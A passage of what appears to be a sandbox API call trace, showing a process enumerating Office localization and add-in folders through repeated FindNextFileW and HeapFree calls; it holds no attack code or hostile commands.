hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14ac0994, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0065.569] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.569] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0065.571] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.571] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0065.573] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.573] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerBI.Diagnostics.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0065.575] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.575] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15a3fea8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0065.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.577] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0065.579] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.579] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b24c93, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0065.581] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.581] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt", cAlternateFileName="")) returned 1 [0065.582] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.582] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15be380c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0065.973] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.973] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0065.975] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.975] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0065.976] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.976] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e92299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0065.977] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.977] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e45dad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0065.979] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.979] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f04999, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-cyrl", cAlternateFileName="")) returned 1 [0065.980] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.980] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0065.981] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.981] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0065.983] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.984] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16035c5a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0065.985] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.985] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0065.994] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.994] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16140cde, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0065.996] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.996] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0066.044] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.044] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0066.046] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.046] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0066.048] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.048] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0066.050] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.050] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0066.050] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0066.050] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0066.050] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PowerPivot Excel Add-in", cAlternateFileName="POWERP~1")) returned 1 [0066.053] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0066.055] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.055] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0066.058] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.058] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0066.344] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.344] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0066.346] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.346] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0066.348] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.348] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0066.403] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.403] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0066.405] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.405] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0066.406] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.406] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0066.408] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.408] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0066.410] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.410] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0066.412] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.412] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0066.414] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.414] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0066.416] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.416] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0066.417] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.417] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0066.420] HeapFree (in: hHeap=0x5d0000, 